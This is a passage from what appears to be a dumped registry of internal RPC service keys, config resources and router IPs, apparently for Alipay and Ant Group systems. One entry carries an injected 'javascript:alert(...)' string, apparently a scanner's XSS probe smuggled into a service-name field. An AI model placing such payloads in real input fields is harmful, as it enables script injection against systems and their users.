FIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.miniprograms.MiniProgramBindFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.order.OrderFilingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_O2O#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.schedule.operation.platform.facade.dag.InstanceDagQueryApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsDailyBillUserInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:ecsportal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.process.common.service.facade.OperateTraceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.mif.common.service.facade.category.MccOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insleads.common.service.facade.provider.ServiceProviderFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:${filefactory_unique_id}@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.66.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileappcommon.common.service.facade.openapi.clientswitch.ClientSwitchOpenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.activity.api.SevenActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.WorkBenchBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker-tutorial:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotonemng.common.service.api.MsgboxMktBannerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.MobileQrCodeRpcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gclearingcenter.facade.api.GclearingAgentQuotaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.PublicAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitAccessControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsentry.facade.PromoCampCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.api.TradeIndustryInfoProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinterbankcenter.common.service.facade.api.InterbankInstInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityprod.common.service.facade.mobileconvoy.MobileConvoyQueryUpSmsCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.community.api.friendships.TwoWayFriendshipsManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcie.common.service.facade.MerchantRiskEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.ProductParaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.168.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.hidenSpiCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.PersonasAmendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.ProdOfferRegionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.demo.SampleRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fascore.common.service.facade.spi.FundAssetCallbackServiceFacade:1.0:fintransfercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.notifier.facade.NotifierRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:control-proxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.AckCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.tinyapp.MstTinyappReportSummaryDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:transfercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_campSkipGrayApproveFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.transfer.FundTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:instpayDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.ChannelPromoteUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.service.tenant.CapTenantAccessKeyService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.ReleaseQueryService:1.0:${dscc_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.forexprod.common.service.facade.ForexBillQueryWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:dishAuditResultMessageSender@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.activitymanage.CrowdPrincipalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.asttshipcore.service.facade.api.manage.AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:userIndexCleanExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.alarmanalysis.service.QueryRetrievedChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:oasistwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchmembercore.common.facade.prepaid.CardFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.college.materialtag.MaterialTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crsociety.api.FuzzyTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_FUNDCARD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_4010#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbadvert.common.service.facade.api.MissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpayplatform.common.service.facade.api.agreement.ExtBankCardDeductAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:tairmanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:assetxp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskmng.common.service.facade.WorkTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gotone.common.service.api.SendRedPointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.taobao.api.TaobaoVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.MallMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.ChatGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.task.VcpBillDownloadOperateRecordFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fundRecommend-able@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.cycle.UserLifeCycleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finbatch_finreconTddlDataSourceV1_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ValidDataClearFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:bpoReimbursementDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceDrugUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mindv.okcourse.service.OkCouresOperateIntegralLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.facade.service.FundDecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.WithdrawDealFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@opssla#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.54.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.131.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.pointspool.PointsPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.mechanismaccess.MechanismSplitflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payboss.PaymentConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifeature.common.service.facade.FeatureInfoFacade:1.0:featureInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.teaching.api.TeachingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.ps.rpc.facade.UserRankFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_ZIAN_TEST3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_O_PAIDCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.Paycore:name=com.alipay.paycore.core.common.drm.LogDRMControl.levelOption,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sdarttool_antprocess_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.api.OdpsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antzproxy.xfire#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linglongmng.facade.api.LinglongMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.shop.ShopQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.biztask.facade.BizTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.settle.SettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:zmepratingwebsite#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openexprod.common.service.facade.PartnerOpenexprodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.member.MemberBankViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.96.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_CLUSTER_SERVERLESS_TEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.DsTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:xdev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.mobileappcommon.common.service.facade.baas.ClientSwitchMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insttrade:name=com.alipay.fc.common.lang.drm.AntBizLogCfgDrm.abTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorcenter.common.service.asset.report.facade.AdvisorReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.52.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.prod.ZhouZhouLeTemplateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:supportprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.amap.aos.channel.service.api.channel.antinvoice.ChannelAntInvoiceOrderHSFService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.upgrade.ClientLoginUpgradeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.user.api.UserExtInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","instbill@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.riskmodelcenter.biz.service.meta.command.RmcMetaService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findefencecore.core.service.dandan.dandan.repository.DbUnitRelateRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.RealNameService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.pointmng.generalpointOracleDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiswisdom.decision.material.sdk.interfaces.MaterialDecision:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdmctotestone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.film.api.AlipayMiddleActivityAPI:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.component.TemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:raycloud_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.closeDrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchishub.common.service.facade.api.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.dpi.api.execution.service.ExecutionEngineService:1.0:artisanDemoExecutionEngineService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_RISK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mmembercenter.common.service.facade.member.api.MemberRelationMamageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.businesstype.api.BusinessTypePropsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.tdm.api.TdmInstitutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_yudian_test_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_INSTPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fraudmng:name=com.alipay.rule.biz.manager.config.PubConfigResource.pubAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:meshyorg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.appealevent.AppealEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:antiep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.divideTriggerConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finmng.service.facade.ctrl.identifyTag.BizTagMgtServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","twa.docker.app:1.0@larksite#@#DEFAULT_INSTANCE_ID#@#TWA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.equityFallBack,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.datasync.SyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdeck.facade.api.QualityTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundForceAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.ldc.api.TransferQueryRProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.zone.drm.ZoneConfigDrm.apiConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.209.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.32.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:javascript:alert('antscanGI2DO3LLHEWTC5TYNNSHALLVNZUXC5LFJFSC2ZDFMRWGG3T2MQ------')@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustrycenter.common.service.facade.EindustryBizParamsDictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.live.LiveMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.dynamic.pcardsales.pcardSettleMultiDataSourceNew.doublewrite.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.156.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:secure-false-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.kwlib:name=com.alipay.fc.common.util.LogManagerTrigger.levelInstruction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.material.CntMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.data.DataPrecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mservicesinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mindv_scene_disapprove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.deposit.api.CardInfoManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsProdLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherNonPaymentConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoTermsFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecore.service.facade.TradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.fcbuservice.common.service.facade.saction.AuthSactionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:VOUCHER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.prodquery.common.service.facade.standard.api.arrangement.rzone.ArrangementQueryStdRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.query.SettleAmountDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.client.drm.CDSClientDrm.fallBackOnString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:cxbizruntime@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-alertserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:antiep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniGameInnerRiskEvaluateManagerImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:icif_cancel_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightNameListService:1.0:campRegionNameListService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:openProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeServiceCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.msecuritycore.SecurityPolicyLibServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zskynet.facade.alarmcheck.DiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:socplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.aedy.facade.OpsCldSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsClaimAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpromoprod.common.service.facade.api.tempup.TempUpPromoProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csshield@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","